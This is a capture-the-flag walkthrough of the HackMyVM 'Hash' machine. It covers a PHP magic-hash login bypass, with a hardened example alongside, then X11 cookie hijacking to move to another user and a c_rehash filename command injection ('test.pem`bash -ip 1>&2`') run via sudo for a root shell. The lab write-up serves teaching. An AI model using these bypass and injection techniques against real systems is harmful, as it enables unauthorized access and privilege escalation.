HackMyVM | Hash

In this walkthrough, I demonstrate how I obtained complete ownership of Hash from HackMyVM
In: HackMyVM, Attack, CTF, Home Lab, Linux, Hard Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

Nmap Results

# Nmap 7.98 scan initiated Fri Feb  6 15:55:11 2026 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.15
Nmap scan report for 10.9.9.15
Host is up (0.00056s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1e:fb:86:3d:cf:26:a2:a0:ae:b0:00:61:0b:41:cb:ab (RSA)
|   256 80:8e:46:7b:1d:6e:13:74:22:89:ad:91:b4:44:64:ec (ECDSA)
|_  256 71:e5:e1:4f:34:16:de:ec:b5:c4:fe:f5:0a:a2:ee:fc (ED25519)
80/tcp   open  http          nginx 1.14.2
|_http-title: LOGIN
|_http-server-header: nginx/1.14.2
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  6 15:55:25 2026 -- 1 IP address (1 host up) scanned in 13.66 seconds

echo -e '10.9.9.15\t\thash.hmv' | sudo tee -a /etc/hosts

Add hosts entry for convenience





Service Enumeration

TCP/80

The form makes an HTTP POST request to /check.php. There's also an interesting comment in the source, indicating the presence of a .bak file.



Looking for the .bak File

grep -v '^#' /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt > wordlist.txt

Filter out comments from word list

ffuf -u 'http://hash.hmv/FUZZ' -w wordlist.txt:FUZZ -e '.bak' -fs 453

Fuzz for any files with '.bak' extension

check.bak               [Status: 200, Size: 273, Words: 26, Lines: 15, Duration: 0ms]

curl -s 'http://hash.hmv/check.bak' -O

Download the file



Understanding the PHP Script

💡
I think it's safe to assume that check.bak is a rough implementation of the authentication logic at http://hash.hmv/check.php.

In the PHP script, you have the following comparison operation:

if ($passwordhashed == '0e0001337') {
  • This is a loose comparison (==) between two strings in PHP
  • 0e0001337 looks like scientific notation, and PHP treats a string of the form 0e<digits> as a numeric string, so it is converted to the float 0 x 10^1337, which evaluates to 0
  • For SHA-256 there are known "magic" inputs whose hex digest starts with 0e and contains only digits after it
    • The hash('sha256',$pass); call in PHP hashes the input with SHA-256
    • The magic input that produces such a hash is 34250003024812
    • It hashes to 0e46289032038065916139621039085883773413820991920706299695051332
    • In the comparison, this string is likewise converted to the float 0 x 10^46289..., which also evaluates to 0
  • Since both sides are converted to floats in the comparison, and 0 = 0, the check passes and authentication is bypassed
Hashing the magic value and casting the result to float gives 0; casting the expected hash to float also gives 0

if ($passwordhashed == '0e0001337') {

Both sides evaluate to 0, so 0 == 0 is true and we successfully authenticate

if ($passwordhashed === '0e0001337') {

Using "===" forces a strict comparison: no numeric conversion happens, and the two strings are compared at their literal values
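To make the difference concrete, here is an added example (not the challenge's check.php) that reproduces the loose comparison beside a hardened version using hash_equals, plus a small check a defender can run to flag "magic" digests. The expected value and the magic input come from the walkthrough above; the function names are mine.

```php
<?php
// Added example: why the loose comparison is bypassable and how to compare safely.
// EXPECTED and MAGIC are the values from the walkthrough; everything else is illustrative.

const EXPECTED = '0e0001337';       // the value check.bak compares against
const MAGIC    = '34250003024812';  // input whose SHA-256 digest is 0e<digits>

// Vulnerable pattern: both operands are numeric strings of the form 0e<digits>,
// so PHP compares them as floats and 0.0 == 0.0 is true.
function loose_check(string $pass): bool {
    $passwordhashed = hash('sha256', $pass);
    return $passwordhashed == EXPECTED;
}

// Hardened pattern: constant-time, byte-for-byte comparison, no type juggling.
// (A real application would store a password_hash() value and use password_verify().)
function strict_check(string $pass): bool {
    $passwordhashed = hash('sha256', $pass);
    return hash_equals(EXPECTED, $passwordhashed);
}

// Defender's check: does a hex digest look like a magic hash, i.e. a numeric
// string that PHP would evaluate to zero (0e followed only by digits)?
function is_magic_hash(string $hex): bool {
    return preg_match('/^0e[0-9]+$/', $hex) === 1;
}

$digest = hash('sha256', MAGIC);
printf("digest        : %s\n", $digest);
printf("magic hash?   : %s\n", is_magic_hash($digest) ? 'yes' : 'no');
printf("loose_check   : %s\n", loose_check(MAGIC) ? 'bypassed' : 'rejected');
printf("strict_check  : %s\n", strict_check(MAGIC) ? 'bypassed' : 'rejected');
printf("random input  : %s\n", loose_check('not-the-password') ? 'bypassed' : 'rejected');
```

Run it with `php example.php`; a non-magic digest (random input) fails even the loose check, because a hex string containing letters other than a single e is not a numeric string and is compared as text.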



Bypass the Authentication Check

Enter any username and enter the magic value in the password field
We saw the user "marco" referenced before, so perhaps this is Marco's SSH key





Exploit

SSH as Marco

cat << 'EOF' > marco_key
-----BEGIN OPENSSH PRIVATE KEY-----
<private key material omitted>
-----END OPENSSH PRIVATE KEY-----
EOF
chmod 600 marco_key





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Linux hash 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Current User

uid=1000(marco) gid=1000(marco) groups=1000(marco),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Sorry, user marco may not run sudo on hash.



Users and Groups

Local Users

maria:x:1001:1001:,,,:/home/maria:/bin/bash

Local Groups

maria:x:1001:



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:f9:29:55 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.15/24 brd 10.9.9.255 scope global dynamic noprefixroute ens18
       valid_lft 6127sec preferred_lft 6127sec
    inet6 fe80::be24:11ff:fef9:2955/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever



Processes and Services

Interesting Processes

./pspy64 > log.txt &
2026/02/06 18:09:01 CMD: UID=1001  PID=3578   | /bin/sh -c /home/maria/myterm.sh 
2026/02/06 18:09:01 CMD: UID=1001  PID=3579   | /bin/sh /home/maria/myterm.sh



Interesting Files

/usr/bin/bwrap

find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 55400 Mar  6  2019 /usr/bin/bwrap

/home/marco/.x


find / -path /proc -prune -o -path /sys -prune -o -type f -writable -ls 2>/dev/null
     2362      0 -rwxrwxrwx   1 maria    maria           0 Feb  5  2021 /home/maria/.Xauthority
     2299      4 -rw-r--r--   1 marco    marco          15 Feb  5  2021 /home/marco/.x

cat /home/marco/.x

marcothehasher

/home/maria/myterm.sh


find / -type f -user maria -exec ls -l {} \; 2>/dev/null
-rwxr-xr-x 1 maria maria 25 Feb  5  2021 /home/maria/myterm.sh

/home/marco/.cache/sessions/xfwm4-2536e4334-541a-4929-996f-cb316d1bff04.state


grep -r maria /home/marco
.cache/sessions/xfwm4-2536e4334-541a-4929-996f-cb316d1bff04.state:  [WM_NAME] Terminal - maria@hash: ~





Privilege Escalation

Lateral to Maria

Globally Writable X11 Session

During the post-exploit enumeration phase, we found some evidence that points us in this direction:

  • tcp/3389 is open on the target (XRDP server)
  • Globally writable X11 session cookie for maria
  • A script that starts xterm as maria on DISPLAY=:10

xfreerdp3 /v:'hash.hmv' /u:'marco' /p:'marcothehasher'
cp /home/marco/.Xauthority /home/maria/.Xauthority

"xterm" window pops up in our session
💡
Why does this work?

xterm is an X11 (GUI) application. Once we copy our own .Xauthority cookie to /home/maria/, the periodically executed /home/maria/myterm.sh still starts xterm as maria, but the cookie it now presents is ours, so the xterm window opens in our X11 session while running as maria.



Add a SSH Key

ssh-keygen -t rsa -b 4096 -f /tmp/maria -C "" -N ""

Run in Maria's xterm session

mkdir /home/maria/.ssh
cat /tmp/maria.pub >> /home/maria/.ssh/authorized_keys
chmod +r /tmp/maria



Lateral to Root

Understanding the Exploit

"/usr/bin/c_rehash" is a Perl script
ℹ️
Doing some more research on this CVE and the /usr/bin/c_rehash script, and asking some questions to Gemini, ChatGPT, and other LLMs, I made enough sense of the exploit to come up with a working example.

Given a directory, c_rehash scans it for certificates, computes each certificate's hash value and creates symbolic links to the certificates, named after those hash values, in that same directory.

c_rehash first looks for the -----BEGIN (.*)----- string to ensure it's processing a certificate file. Then, it returns ($is_cert, $is_crl) depending on the file type.

💡
The vulnerability occurs on "line 164" because the "$fname" value is interpolated into a double-quoted command string that is handed to the shell. When the openssl x509 command is executed, any shell metacharacters in the file name, such as ` or ; or $(), are interpreted by the shell and cause command execution.



Proof of Concept

mkdir /home/maria/pwn
openssl req -new -newkey rsa:4096 -x509 -sha256 -days 3650 -nodes -out /home/maria/pwn/test.pem -keyout /home/maria/pwn/test.key
cd /home/maria/pwn
mv test.pem 'test.pem`touch /home/maria/pwn/pwned.txt`'
sudo /usr/bin/c_rehash .
mv 'test.pem`touch /home/maria/pwn/pwned.txt`' 'test.pem`bash -ip 1>&2`'

Use "1>&2" because c_rehash captures the openssl command's stdout (only stderr reaches the terminal), so the injected shell's stdout must be redirected to stderr in order to see it



Flags

User

hashmanready

Root

hashhater 